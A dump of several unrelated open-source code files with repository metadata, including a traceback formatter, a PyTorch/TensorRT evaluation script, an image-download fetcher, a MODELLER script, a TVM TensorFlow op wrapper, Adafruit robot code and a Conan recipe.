                type=type(e).__name__,
                message=traceback._some_str(e),
            ),
            tail="",
        )
    def format_stack(self, frame_or_tb=None) -> List[dict]:
        """Format a stack from a frame or traceback (default: caller's frame)."""
        if frame_or_tb is None:
            frame_or_tb = inspect.currentframe().f_back
        return list(
            self.format_stack_data(
                FrameInfo.stack_data(
                    frame_or_tb,
                    self.options,
                    collapse_repeated_frames=self.collapse_repeated_frames,
                )
            )
        )
    def format_stack_data(
        self, stack: Iterable[Union[FrameInfo, RepeatedFrames]]
    ) -> Iterable[dict]:
        """Yield one tagged dict per stack entry, skipping filtered frames."""
        for item in stack:
            if isinstance(item, FrameInfo):
                if not self.should_include_frame(item):
                    continue
                yield dict(type="frame", **self.format_frame(item))
            else:
                yield dict(type="repeated_frames", **self.format_repeated_frames(item))
    def format_repeated_frames(self, repeated_frames: RepeatedFrames) -> dict:
        """Summarize collapsed repeated frames: per-code-location counts,
        most frequent first, ties broken by function name."""
        counts = sorted(
            Counter(repeated_frames.frame_keys).items(),
            key=lambda item: (-item[1], item[0][0].co_name),
        )
        return dict(
            frames=[
                dict(
                    name=code.co_name,
                    lineno=lineno,
                    count=count,
                )
                for (code, lineno), count in counts
            ]
        )
    def format_frame(self, frame: Union[FrameInfo, FrameType, TracebackType]) -> dict:
        """Format a single frame: name, location, rendered source lines and,
        if enabled, local variables."""
        if not isinstance(frame, FrameInfo):
            frame = FrameInfo(frame, self.options)
        result = dict(
            name=(
                frame.executing.code_qualname()
                if self.use_code_qualname
                else frame.code.co_name
            ),
            filename=frame.filename,
            lineno=frame.lineno,
            lines=list(self.format_lines(frame.lines)),
        )
        if self.show_variables:
            result["variables"] = list(self.format_variables(frame))
        return result
    def format_lines(self, lines):
        """Yield dicts for source lines; omitted ranges become line gaps."""
        for line in lines:
            if isinstance(line, Line):
                yield dict(type="line", **self.format_line(line))
            else:
                yield dict(type="line_gap")
    def format_line(self, line: Line) -> dict:
        """Render one source line honoring pygments/html/indent settings."""
        return dict(
            is_current=line.is_current,
            lineno=line.lineno,
            text=line.render(
                pygmented=self.pygmented,
                escape_html=self.html,
                strip_leading_indent=self.strip_leading_indent,
            ),
        )
    def format_variables(self, frame_info: FrameInfo) -> Iterable[dict]:
        """Yield formatted locals sorted by name; errors are logged, never
        raised (best-effort)."""
        try:
            for var in sorted(frame_info.variables, key=lambda v: v.name):
                yield self.format_variable(var)
        except Exception:  # pragma: no cover
            log.exception("Error in getting frame variables")
    def format_variable(self, var: Variable) -> dict:
        """Format one variable as an (escaped) name/value pair."""
        return dict(
            name=self.format_variable_part(var.name),
            value=self.format_variable_part(self.format_variable_value(var.value)),
        )
    def format_variable_part(self, text):
        # HTML-escape only when producing HTML output.
        if self.html:
            return escape_html(text)
        else:
            return text
    def format_variable_value(self, value) -> str:
        """Hook: how a variable's value is rendered (repr by default)."""
        return repr(value)
    def should_include_frame(self, frame_info: FrameInfo) -> bool:
        """Hook: return False to exclude a frame from the output."""
        return True  # pragma: no cover
|
[
"joao.a.severgnini@gmail.com"
] |
joao.a.severgnini@gmail.com
|
e0ac24619a342a1b4cf7f9e015cbbcec4a3161d4
|
c9b5f49906e213c0c6edd25c063961b8226b67af
|
/compression/evaluate.py
|
a6d3d4e3f36ec271fc6ec3957c65c952d9ea8164
|
[] |
no_license
|
danielzgsilva/jetson_projects
|
c481ff505c97ac40089438f34ae24b74e265631c
|
72ab79a2d4759fe51d107432aa9ff6ce2c728a53
|
refs/heads/master
| 2023-01-20T20:22:04.410741
| 2020-12-01T21:31:07
| 2020-12-01T21:31:07
| 294,460,502
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,723
|
py
|
import os
#os.environ['CUDA_LAUNCH_BLOCKING']='1'
import config
import torch
import numpy as np
from dataloader import TrainDataset, ValidationDataset, DataLoader, get_cifar100_dataset
from model import VGGModel, VGGModel_old
import time
from basisModel import basisModel, display_stats
from options import Options
opts = Options().parse()
if opts.tensorRT:
from torch2trt import torch2trt
def get_accuracy(y_pred, y):
    """Fraction of samples whose arg-max prediction matches label ``y``."""
    predicted_labels = y_pred.argmax(dim=-1)
    correct = predicted_labels.eq(y).type(torch.float)
    return correct.mean()
def validation(model, data_loader, opts):
    """Benchmark ``model`` over ``data_loader``.

    Optionally compresses the model with the basis-filter algorithm
    (``opts.compress``) and/or optimizes it with TensorRT (``opts.tensorRT``),
    then runs ``opts.n`` timed passes over the whole loader.

    Returns:
        (avg_time, avg_acc): average per-image latency in microseconds
        (excluding the first warm-up iteration when more than one was run)
        and average accuracy in percent.
    """
    model.eval()
    if opts.compress:
        print('Compressing model with basis filter algorithm, compression factor of {}'.format(opts.compress_factor))
        model = basisModel(model, opts.use_weights, opts.add_bn, opts.fixed_basbs)
        model.update_channels(opts.compress_factor)
        display_stats(model, (64,64))
    else:
        print('No compression schema')
    if config.use_cuda:
        model.cuda()
    if opts.tensorRT:
        print('Optimizing model with TensorRT')
        # Get random input to pass as a sample to TensorRT
        x, _ = next(iter(data_loader))
        if config.use_cuda:
            x = x.cuda()
        else:
            raise RuntimeError('Cannot use TensorRT without CUDA')
        # Optimize, then drop the original model/sample before keeping the
        # TensorRT version to free GPU memory.
        trt_model = torch2trt(model, [x], max_batch_size=config.batch_size)
        del model
        del x
        torch.cuda.empty_cache()
        model = trt_model
        model.cuda()
    else:
        print('No TensorRT')
    print('memory usage:')
    print(torch.cuda.memory_allocated())
    print(torch.cuda.memory_summary())
    print('Evaluating model with {} iterations over {} images'.format(opts.n, len(data_loader)*config.batch_size))
    all_times, all_accs = [], []
    for i in range(opts.n):
        times, accs = [], []
        for _, sample in enumerate(data_loader):
            x, y = sample
            if config.use_cuda:
                x = x.cuda()
                y = y.cuda()
            with torch.no_grad():
                start_time = time.time()
                y_pred = model(x)
                end_time = time.time()
            times.append((end_time-start_time)/float(x.shape[0]) * 1000 * 1000)  # average time per image, micro-seconds
            acc = get_accuracy(y_pred, y)  # accuracy for this batch
            accs.append(acc.item())
        iteration_time, iteration_acc = float(np.mean(times)), float(np.mean(accs))*100
        all_times.append(iteration_time)
        all_accs.append(iteration_acc)
        print('Iteration %d: Avg Time per Image: %.4f (micro-sec) Accuracy: %.4f' % (i, iteration_time, iteration_acc), flush=True)
    # Drop the first (warm-up) iteration from the latency average when we have
    # more than one sample; previously np.mean(all_times[1:]) produced NaN for
    # opts.n == 1 because the slice was empty.
    timing_samples = all_times[1:] if len(all_times) > 1 else all_times
    avg_time, avg_acc = float(np.mean(timing_samples)), float(np.mean(all_accs))
    print('-'*70)
    # Typo fix in the output message: 'reuslts' -> 'results'.
    print('Final results: Avg Time per Image: %.4f (micro-sec) Accuracy: %.4f' % (avg_time, avg_acc), flush=True)
    return avg_time, avg_acc
def evaluate(opts):
    """Load the CIFAR-100 validation split and the saved model, then benchmark it."""
    val_dataset = get_cifar100_dataset('./data/', False, download=True)
    val_dataloader = DataLoader(val_dataset, batch_size=config.batch_size, shuffle=False, num_workers=config.workers)
    save_file_path = os.path.join(opts.save_dir, opts.model)
    if opts.load_state_dict:
        # Checkpoint holds only weights: rebuild the architecture first.
        if opts.use_vgg_old:
            model = VGGModel_old(n_classes=config.n_classes)
        else:
            model = VGGModel(n_classes=config.n_classes)
        model.load_state_dict(torch.load(save_file_path)['state_dict'])
    else:
        # Checkpoint is a fully pickled model object.
        model = torch.load(save_file_path)
    avg_time, avg_acc = validation(model, val_dataloader, opts)
if __name__ == '__main__':
    evaluate(opts)
|
[
"danielzgsilva@knights.ucf.edu"
] |
danielzgsilva@knights.ucf.edu
|
fb588a29ad13110bfe5be22b2eca5aff80ed72bc
|
51bab842d885e6d5e6dc0892522ed8ce82f2be9d
|
/src/picktrue/sites/abstract.py
|
ca470e6512e31356d37569ab9e178342d9c4e097
|
[
"MIT"
] |
permissive
|
winkidney/PickTrue
|
d941e5e9eb420f4a80bd0bbe1c06a0ab8ff3c861
|
772b105e4de3852bba41369221f47b8480bf1070
|
refs/heads/master
| 2023-03-12T01:40:54.780845
| 2023-03-10T17:23:55
| 2023-03-10T17:23:55
| 144,246,340
| 146
| 16
|
MIT
| 2020-07-24T13:02:24
| 2018-08-10T06:32:10
|
Python
|
UTF-8
|
Python
| false
| false
| 2,353
|
py
|
import os
from pathlib import Path
import requests
from picktrue.meta import UA, ImageItem
from picktrue.utils import retry
def normalize_proxy_string(proxy):
    """Rewrite socks5:// proxies as socks5h:// so DNS resolves via the proxy.

    Strings already using socks5h, or non-socks proxies, pass through unchanged.
    """
    needs_remote_dns = 'socks5' in proxy and 'socks5h' not in proxy
    if needs_remote_dns:
        return proxy.replace('socks5', 'socks5h')
    return proxy
def get_proxy(proxy_string=None):
    """Build requests-style kwargs ({'proxies': {...}}) from a proxy string.

    Returns {} when no proxy is configured, so the result can be splatted
    directly into a requests call either way.
    """
    if proxy_string is None:
        return {}
    normalized = normalize_proxy_string(proxy_string)
    return {
        'proxies': {scheme: normalized for scheme in ('http', 'https')},
    }
class DummySite:
    """Abstract site interface; subclasses implement all three properties."""
    @property
    def dir_name(self):
        # Name of the directory downloads are saved under.
        raise NotImplementedError()
    @property
    def fetcher(self):
        # Fetcher object (DummyFetcher subclass, presumably) used for HTTP requests.
        raise NotImplementedError()
    @property
    def tasks(self):
        # Iterable of download task items — see picktrue.meta.TaskItem usage
        # in DummyFetcher.save.
        raise NotImplementedError()
class DummyFetcher:
    """Base HTTP fetcher: a retrying requests session plus helpers to build
    safe file names/paths and persist downloaded content."""
    def __init__(self, proxies=None):
        self.session = requests.session()
        if proxies is not None:
            self.session.proxies = proxies
        # Send a browser-like user-agent header on every request.
        self.session.headers.update(UA)
    @staticmethod
    def _safe_name(name):
        # Make a string usable as a file name: turn path separators into
        # spaces, trim, then collapse spaces to dashes.
        name = name.replace("/", " ")
        name = name.replace("\\", " ")
        name = name.strip()
        name = name.replace(" ", '-')
        return name
    @staticmethod
    def _safe_path(path):
        # Resolve to an absolute Path object.
        return Path(path).absolute()
    @retry()
    def get(self, url, **kwargs):
        """
        :rtype: requests.Response
        """
        # Enforce our own (connect=2s, read=30s) timeout; a caller-supplied
        # timeout kwarg is deliberately discarded.
        if 'timeout' in kwargs:
            kwargs.pop('timeout')
        return self.session.get(url, timeout=(2, 30), **kwargs)
    def get_save_path(self, base_path, image_name, image: ImageItem):
        """Build the destination path; ``image`` is unused here but lets
        subclasses route by image metadata."""
        save_path = os.path.join(
            base_path,
            image_name,
        )
        return save_path
    def save(self, content, task_item):
        """
        :type content: bytearray
        :type task_item: picktrue.meta.TaskItem
        """
        image = task_item.image
        image_name = image.name
        # image.name may be a callable deriving the file name from url+content.
        if callable(image.name):
            image_name = image.name(image.url, content)
        save_path = self.get_save_path(
            task_item.base_save_path,
            image_name,
            image,
        )
        save_path = self._safe_path(save_path)
        # Skip files that already exist so re-runs are idempotent.
        if os.path.exists(save_path):
            return
        with open(save_path, "wb") as f:
            f.write(content)
            f.flush()
|
[
"winkidney@gmail.com"
] |
winkidney@gmail.com
|
f07fecfbe41fa6f5a0d071a0779023ddd9a066ad
|
43268854505070471e0911bc0e5b280cadec8601
|
/modeller9v8/examples/commands/all_hydrogen.py
|
277f74f956357eaf0efaf2fe95d7ea9c4afac96a
|
[] |
no_license
|
realbigws/From_CA_to_FullAtom
|
08621bf350c77e29140051d1af850a51e5fe138f
|
a59d9fcbc6c1f2bfc5fc2d77da26318c63ac3052
|
refs/heads/master
| 2020-05-30T01:37:47.378404
| 2019-05-30T21:42:45
| 2019-05-30T21:42:45
| 189,481,583
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 955
|
py
|
# This will read a specified atom file, generate all hydrogen atoms,
# add atomic radii and charges, and write the model to a PDB file in
# the GRASP format. This can be used with GRASP to display electrostatic
# properties without assigning charges and radii in GRASP.
from modeller import *
from modeller.scripts import complete_pdb
log.verbose()
env = environ()
env.io.atom_files_directory = ['../atom_files']
env.libs.topology.read(file='$(LIB)/top_allh.lib')
env.libs.parameters.read(file='$(LIB)/par.lib')
def patch_disulfides(mdl):
    """Patch topology to remove sulfhydril hydrogens"""
    # Residue-number pairs forming disulfide bridges in 1fas; the DISU patch
    # bonds each cysteine pair (and drops their SH hydrogens per the
    # docstring above).
    for ids in [ ('17', '39'),
                 ( '3', '22'),
                 ('53', '59'),
                 ('41', '52') ]:
        mdl.patch(residue_type='DISU', residues=[mdl.residues[r] for r in ids])
mdl = complete_pdb(env, "1fas", patch_disulfides)
mdl.write(file='1fas.ini1', model_format='GRASP')
mdl.write(file='1fas.ini2', model_format='PDB')
|
[
"wangsheng@ttic.edu"
] |
wangsheng@ttic.edu
|
5a11112058ae007b6764e25e44cccde6c87c2df1
|
77ab593ed55a6d46b1778f6d41bc70ced3f8cd46
|
/face_into/face72/see_data.py
|
f713bea53d21afcdad492cd716761cea8e41e100
|
[] |
no_license
|
wosxcc/bot
|
e93b92fbca79a915feb186160f3f72c99218ffcb
|
c097f5455bc6264c9f778fb72900475963836153
|
refs/heads/master
| 2021-06-12T12:43:47.314071
| 2018-12-14T08:51:43
| 2018-12-14T08:51:43
| 128,619,488
| 7
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,321
|
py
|
import os
import cv2 as cv
# Directory of <name>.jpg / <name>.txt pairs; each txt holds space-separated
# floats: a label, a second value, then normalized (x, y) landmark pairs.
path_files = 'E:/dectect/dectect/face68'
for file in os.listdir(path_files):
    if (file[-4:]=='.txt'):
        print(file)
        img = cv.imread(path_files+'/' + file[:-4]+'.jpg')
        txt_open = open(path_files+'/' + file)
        txt_read = txt_open.read()
        txt_lines =txt_read.split(' ')
        txt_float = [float(i) for i in txt_lines]
        # Presumably smile labels: 0 -> 'buxiao', 2 -> 'daxiao', else 'xiao'
        # — TODO confirm against the labeling tool.
        biaoq= 'xiao'
        if txt_float[0]==0:
            biaoq='buxiao'
        elif txt_float[0]==2:
            biaoq='daxiao'
        biaoq += str(txt_float[1])
        img = cv.putText(img, biaoq, (0, 25), 2, cv.FONT_HERSHEY_PLAIN, (255, 0, 0))
        # Draw each landmark; coordinates are normalized, scale by image size.
        for x in range(int(len(txt_float)/2)-1):
            img=cv.circle(img,(int(txt_float[2 + x * 2]*img.shape[1]),int(txt_float[2 + x * 2 + 1]*img.shape[0])),1,(0,255,0),-1)
        cv.imshow('img', img)
        txt_open.close()
        k = cv.waitKey(0) & 0xFF
        # 'd': delete current pair; 'e': delete the previous pair; else keep.
        if k == ord('d'):
            os.remove(path_files + '/' + file)
            os.remove(path_files + '/' + file[:-4] + '.jpg')
            print('删除成功', path_files + '/' + file)
        elif k == ord('e'):
            # NOTE(review): pressing 'e' on the very first image raises
            # NameError because last_img is not yet assigned — confirm intended.
            os.remove(last_img)
            os.remove(last_img[:-4] + '.jpg')
            print('删除前一张', last_img)
        else:
            last_img = path_files + '/' + file
|
[
"821022156@qq.com"
] |
821022156@qq.com
|
ed202550c399b038c7bfb0bf2e966d9f0662b5d4
|
2d05050d0ada29f7680b4df20c10bb85b0530e45
|
/python/tvm/contrib/tf_op/module.py
|
bcff2741630c5308254ab8df9ed28a5875b956ff
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"Zlib",
"LLVM-exception",
"BSD-2-Clause"
] |
permissive
|
apache/tvm
|
87cb617f9a131fa44e1693303aaddf70e7a4c403
|
d75083cd97ede706338ab413dbc964009456d01b
|
refs/heads/main
| 2023-09-04T11:24:26.263032
| 2023-09-04T07:26:00
| 2023-09-04T07:26:00
| 70,746,484
| 4,575
| 1,903
|
Apache-2.0
| 2023-09-14T19:06:33
| 2016-10-12T22:20:28
|
Python
|
UTF-8
|
Python
| false
| false
| 4,901
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Module container of TensorFlow TVMDSO op"""
import tensorflow as tf
from tensorflow.python.framework import load_library
from tensorflow.python import platform
class OpModule:
    """Wrapper around an exported TVM operator shared library.

    Exposes the library's operators as TensorFlow-callable functions, either
    through :meth:`func` or subscript access (``module["op_name"]``).
    """
    def __init__(self, lib_path):
        self.lib_path = lib_path
    def func(self, name, output_dtype=None, output_shape=None):
        """Return a TensorFunc wrapping operator ``name``.

        Per TensorFunc's contract, ``output_dtype`` defaults to float32 and
        ``output_shape`` defaults to the first input's shape.
        """
        return TensorFunc(self.lib_path, name, output_dtype, output_shape)
    def __getitem__(self, func_name):
        # module["op"] is shorthand for module.func("op") with defaults.
        return self.func(func_name)
class TensorFunc:
    """Function object that acts as TensorFlow tensor to tensor function."""
    def __init__(self, lib_path, func_name, output_dtype, output_shape):
        self.lib_path = lib_path
        self.func_name = func_name
        self.output_dtype = output_dtype
        # const(0) indicate invalid dynamic shape
        self.dynamic_output_shape = tf.constant(0, tf.int64)
        self.static_output_shape = None
        self.has_static_output_shape = False  # extra flag is required
        # A plain list of non-negative Python ints counts as a static shape;
        # any other non-None shape is packed into an int64 shape tensor.
        if self._is_static_shape(output_shape):
            self.static_output_shape = output_shape
            self.has_static_output_shape = True
        elif output_shape is not None:
            self.dynamic_output_shape = self._pack_shape_tensor(output_shape)
        self.module = self._load_platform_specific_library("libtvm_dso_op")
        self.tvm_dso_op = self.module.tvm_dso_op
    def apply(self, *params):
        """Invoke the wrapped TVM DSO op on ``params`` tensors."""
        return self.tvm_dso_op(
            params,
            dynamic_output_shape=self.dynamic_output_shape,
            static_output_shape=self.static_output_shape,
            has_static_output_shape=self.has_static_output_shape,
            lib_path=self.lib_path,
            func_name=self.func_name,
            output_dtype=self.output_dtype,
        )
    def __call__(self, *params):
        # Calling the object is equivalent to apply().
        return self.apply(*params)
    def _load_platform_specific_library(self, lib_name):
        """Load the TVM DSO op plugin with the OS-appropriate file extension."""
        # NOTE(review): 'platform' here is tensorflow.python.platform (imported
        # at module top), not the stdlib module — confirm it provides system().
        system = platform.system()
        if system == "Darwin":
            lib_file_name = lib_name + ".dylib"
        elif system == "Windows":
            lib_file_name = lib_name + ".dll"
        else:
            lib_file_name = lib_name + ".so"
        return load_library.load_op_library(lib_file_name)
    def _is_static_shape(self, shape):
        """True iff ``shape`` is a list of non-negative Python ints."""
        if shape is None or not isinstance(shape, list):
            return False
        for dim_value in shape:
            if not isinstance(dim_value, int):
                return False
            if dim_value < 0:
                raise Exception(f"Negative dimension is illegal: {dim_value}")
        return True
    def _pack_shape_tensor(self, shape):
        """Normalize a shape tensor, or a list of ints/scalar tensors, into a
        rank-1 int64 tensor."""
        if isinstance(shape, tf.Tensor):
            if shape.dtype == tf.int32:
                shape = tf.cast(shape, tf.int64)
        elif isinstance(shape, list):
            shape_dims = []
            for dim_value in shape:
                if isinstance(dim_value, int):
                    shape_dims.append(tf.constant(dim_value, tf.int64))
                elif isinstance(dim_value, tf.Tensor) and dim_value.shape.rank == 0:
                    if dim_value.dtype == tf.int32:
                        dim_value = tf.cast(dim_value, tf.int64)
                    shape_dims.append(dim_value)
                else:
                    raise TypeError("Input shape dimension is neither scalar tensor nor int")
            shape = tf.stack(shape_dims)
        else:
            raise TypeError("Input shape is neither tensor nor list")
        return shape
|
[
"noreply@github.com"
] |
apache.noreply@github.com
|
03e2d01099f8601a427ced9e76c0efe84bdc6d95
|
947af25b72b5b3037443fae3fb22fa3a2f1de363
|
/nextgisweb_mapserver/mapfile/keyword_tests.py
|
8857613f74b6be20b27ab8cb8421416a1f7d64c7
|
[] |
no_license
|
guardeivid/nextgisweb_mapserver
|
2b527b160b6cb017ae9c6a663e4171783a9c89d2
|
34376442fe6d56794c32523050ceb338a902228f
|
refs/heads/master
| 2020-03-30T02:50:50.893436
| 2014-04-14T09:19:49
| 2014-04-14T09:19:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 528
|
py
|
# -*- coding: utf-8 -*-
from lxml.etree import tostring, fromstring, RelaxNG
from .keyword import registry
def _test_shema(cls):
    # Build the directive's RelaxNG element schema and check that it is a
    # valid RelaxNG document by parsing it with lxml.
    # (Python 2 code; the 'shema' spelling is a historical typo referenced
    # by test_schema below.)
    root = cls.element_schema()
    root.set('datatypeLibrary', 'http://www.w3.org/2001/XMLSchema-datatypes')
    xml = tostring(root, pretty_print=True)
    idx = 1
    # Dump the schema with line numbers to make RelaxNG errors debuggable.
    print ''
    for s in xml.split('\n'):
        print "%03d: %s" % (idx, s)
        idx += 1
    print ''
    RelaxNG(fromstring(xml))
def test_schema():
    # Nose-style generator test: yield one schema validation per registered
    # mapfile directive.
    for directive in registry:
        yield _test_shema, directive
|
[
"me@dezhin.net"
] |
me@dezhin.net
|
7f5d989cb77b8fbbb53231f3820afe5b56fbe207
|
18f0ad99e21e2e35126f8c3c28079d358fa2129a
|
/SnakeBot/buzzer/code.py
|
6488f15e023e6bf5709d147c707884478c919297
|
[
"MIT"
] |
permissive
|
ladyada/Adafruit_Learning_System_Guides
|
9bf18dfa35941e0cbecbb3c2d02b4fa3cb79744f
|
6d76801878cbf65132ccea950dc47ae842c73dcd
|
refs/heads/master
| 2023-08-20T20:30:42.910576
| 2022-01-10T20:28:11
| 2022-01-10T20:28:11
| 115,837,894
| 13
| 2
|
MIT
| 2020-03-31T23:23:45
| 2017-12-31T02:34:47
|
C
|
UTF-8
|
Python
| false
| false
| 2,930
|
py
|
import time
import random
from adafruit_crickit import crickit
# Direction constants used by tack() below.
LEFT = False
RIGHT = True
random.seed(int(time.monotonic()))
ss = crickit.seesaw
# Drive motors: motor 1 = left wheel, motor 2 = right wheel.
left_wheel = crickit.dc_motor_1
right_wheel = crickit.dc_motor_2
# Bumper switches on Crickit signal pins; with INPUT_PULLUP they read low
# (False) when pressed, hence the 'not digital_read' checks below.
RIGHT_BUMPER = crickit.SIGNAL1
LEFT_BUMPER = crickit.SIGNAL2
CENTER_BUMPER = crickit.SIGNAL3
ss.pin_mode(RIGHT_BUMPER, ss.INPUT_PULLUP)
ss.pin_mode(LEFT_BUMPER, ss.INPUT_PULLUP)
ss.pin_mode(CENTER_BUMPER, ss.INPUT_PULLUP)
# These allow easy correction for motor speed variation.
# Factors are determined by observation and fiddling.
# Start with both having a factor of 1.0 (i.e. none) and
# adjust until the bot goes more or less straight
def set_right(speed):
    # 0.9 factor compensates for motor speed variation (see calibration
    # comments above).
    right_wheel.throttle = speed * 0.9
def set_left(speed):
    # Left motor is the reference: no correction factor.
    left_wheel.throttle = speed
# Uncomment this to find the above factors
# set_right(1.0)
# set_left(1.0)
# while True:
# pass
# Check for bumper activation and move away accordingly
# Returns False if we got clear, True if we gave up
def react_to_bumpers():
    """Back away and turn until no bumper is pressed.

    Returns False once clear, True after 3 failed attempts (give up).
    """
    attempt_count = 0
    # keep trying to back away and turn until we're free
    while True:
        # give up after 3 tries
        if attempt_count == 3:
            return True
        # Bumpers are active-low (INPUT_PULLUP), hence the negation.
        bumped_left = not ss.digital_read(LEFT_BUMPER)
        bumped_right = not ss.digital_read(RIGHT_BUMPER)
        bumped_center = not ss.digital_read(CENTER_BUMPER)
        # Didn't bump into anything, we're done here
        if not bumped_left and not bumped_right and not bumped_center:
            return False
        # If the middle bumper was triggered, randomly pick a way to turn
        if bumped_center:
            bumped_left |= random.randrange(10) < 5
            bumped_right = not bumped_left
        # Back away a bit
        set_left(-0.5)
        set_right(-0.5)
        time.sleep(0.5)
        # If we bumped on the left, turn to the right
        if bumped_left:
            set_left(1.0)
            set_right(0.0)
        # If we bumped on the right, turn left
        elif bumped_right:
            set_left(0.0)
            set_right(1.0)
        # time to turn for
        time.sleep(random.choice([0.2, 0.3, 0.4]))
        attempt_count += 1
def tack(direction, duration):
    """Veer LEFT or RIGHT for ``duration`` seconds while polling bumpers.

    Returns react_to_bumpers()'s result if a bumper triggers mid-tack
    (True = gave up), otherwise False after the time elapses.
    """
    target_time = time.monotonic() + duration
    # Slow the inside wheel to curve in the requested direction.
    if direction == LEFT:
        set_left(0.25)
        set_right(1.0)
    else:
        set_left(1.0)
        set_right(0.25)
    while time.monotonic() < target_time:
        # Any bumper reading low (pressed) interrupts the tack.
        if not(ss.digital_read(LEFT_BUMPER) and
               ss.digital_read(RIGHT_BUMPER) and
               ss.digital_read(CENTER_BUMPER)):
            return react_to_bumpers()
    return False
# Zig-zag forward until react_to_bumpers() gives up (tack returns True).
while True:
    if tack(LEFT, 0.75):
        break
    if tack(RIGHT, 0.75):
        break
# Stuck: stop both wheels, then sound the buzzer (drive 2) forever in
# bursts of three short beeps every ~10 seconds.
set_left(0)
set_right(0)
while True:
    for _ in range(3):
        crickit.drive_2.fraction = 1.0
        time.sleep(0.1)
        crickit.drive_2.fraction = 0.0
        time.sleep(.2)
    time.sleep(10.0)
|
[
"dastels@daveastels.com"
] |
dastels@daveastels.com
|
d5a2f49110fd363deb27708c646b22143667b47c
|
5e381364c2ab31ff3618369085afffba6caa8edb
|
/recipes/xtr/all/conanfile.py
|
e4caa905f0a2d8e333cbaa86e7345766dda819a1
|
[
"MIT"
] |
permissive
|
CAMOBAP/conan-center-index
|
16aea68a6d22da22831ba985773125e8eda08f00
|
67d57532bdad549fef3fa6cb8fcdfa86bc55e4f1
|
refs/heads/master
| 2023-07-30T08:58:57.285571
| 2021-10-02T14:57:54
| 2021-10-02T14:57:54
| 323,262,699
| 1
| 0
|
MIT
| 2021-05-29T13:37:04
| 2020-12-21T07:30:02
|
Python
|
UTF-8
|
Python
| false
| false
| 3,685
|
py
|
from conans import ConanFile, AutoToolsBuildEnvironment, tools
from conans.errors import ConanInvalidConfiguration
import os
class XtrConan(ConanFile):
    """Conan recipe for the XTR logging library.

    Builds via XTR's GNU makefile and packages the static library plus the
    xtrctl command-line tool. Linux/FreeBSD x86_64 with C++20 only.
    """
    name = "xtr"
    description = \
        "C++ Logging Library for Low-latency or Real-time Environments"
    topics = ("xtr", "logging", "logger")
    url = "https://github.com/conan-io/conan-center-index"
    homepage = "https://github.com/choll/xtr"
    license = "MIT"
    settings = "os", "arch", "compiler", "build_type"
    options = {
        "fPIC": [True, False],
        "enable_exceptions": [True, False],
        "enable_lto": [True, False],
    }
    default_options = {
        "fPIC": True,
        "enable_exceptions": True,
        "enable_lto": False,
    }
    generators = "make"
    def requirements(self):
        self.requires("fmt/7.1.3")
    def validate(self):
        """Reject unsupported os/compiler/arch and enforce C++20-capable compilers."""
        if self.settings.os not in ("FreeBSD", "Linux"):
            raise ConanInvalidConfiguration(f"Unsupported os={self.settings.os}")
        if self.settings.compiler not in ("gcc", "clang"):
            raise ConanInvalidConfiguration(f"Unsupported compiler={self.settings.compiler}")
        if self.settings.arch not in ("x86_64", ):
            raise ConanInvalidConfiguration(f"Unsupported arch={self.settings.arch}")
        minimal_cpp_standard = 20
        if self.settings.compiler.cppstd:
            tools.check_min_cppstd(self, minimal_cpp_standard)
        # Minimum compiler majors known to support the required C++20 features.
        minimum_version = {"gcc": 10, "clang": 12}
        compiler = str(self.settings.compiler)
        version = tools.Version(self.settings.compiler.version)
        if version < minimum_version[compiler]:
            raise ConanInvalidConfiguration(
                f"{self.name} requires {self.settings.compiler} version {minimum_version[compiler]} or later")
    def source(self):
        tools.get(**self.conan_data["sources"][self.version], strip_root=True)
    def build(self):
        """Drive XTR's GNU makefile, mapping Conan build vars onto it."""
        # FIXME: should be done in validate (but version is not yet available there)
        if tools.Version(self.deps_cpp_info["fmt"].version) < 6:
            raise ConanInvalidConfiguration("The version of fmt must >= 6.0.0")
        if tools.Version(self.deps_cpp_info["fmt"].version) == "8.0.0" and self.settings.compiler == "clang":
            raise ConanInvalidConfiguration("fmt/8.0.0 is known to not work with clang (https://github.com/fmtlib/fmt/issues/2377)")
        autotools = AutoToolsBuildEnvironment(self)
        env_build_vars = autotools.vars
        # Conan uses LIBS, presumably following autotools conventions, while
        # the XTR makefile follows GNU make conventions and uses LDLIBS
        env_build_vars["LDLIBS"] = env_build_vars["LIBS"]
        # fPIC and Release/Debug/RelWithDebInfo etc are set via CXXFLAGS,
        # CPPFLAGS etc.
        env_build_vars["EXCEPTIONS"] = \
            str(int(bool(self.options.enable_exceptions)))
        env_build_vars["LTO"] = str(int(bool(self.options.enable_lto)))
        autotools.make(vars=env_build_vars)
        autotools.make(vars=env_build_vars, target="xtrctl")
    def package(self):
        """Copy license, headers, static lib and the xtrctl binary into the package."""
        self.copy("LICENSE", dst="licenses")
        self.copy("*.hpp", src="include", dst="include")
        self.copy("*/libxtr.a", src="build", dst="lib", keep_path=False)
        self.copy("*/xtrctl", src="build", dst="bin", keep_path=False)
        tools.rmdir(os.path.join(self.package_folder, "man"))
    def package_info(self):
        self.cpp_info.libs = ["xtr"]
        self.cpp_info.system_libs = ["pthread"]
        bin_path = os.path.join(self.package_folder, "bin")
        self.output.info(f"Appending PATH environment variable: {bin_path}")
        self.env_info.PATH.append(bin_path)
|
[
"noreply@github.com"
] |
CAMOBAP.noreply@github.com
|
5404d94c2cb141aaa4fa36f139bbfc2f161ce03f
|
a8731ed73a1fbae2d1e490fc8951aa17873aa7d4
|
/iga/population/standard_analysis.py
|
163123558095eccca04cfb007d8470d1031bdae1
|
[] |
no_license
|
juancq/character-evolver
|
452bf84afd52766502fbe6ba6471519d1a7635e1
|
5dcae96916dbfef03cc8f6625e4a4c31fe25224f
|
refs/heads/master
| 2021-01-23T18:08:21.058617
| 2017-05-22T02:08:58
| 2017-05-22T02:08:58
| 129,113
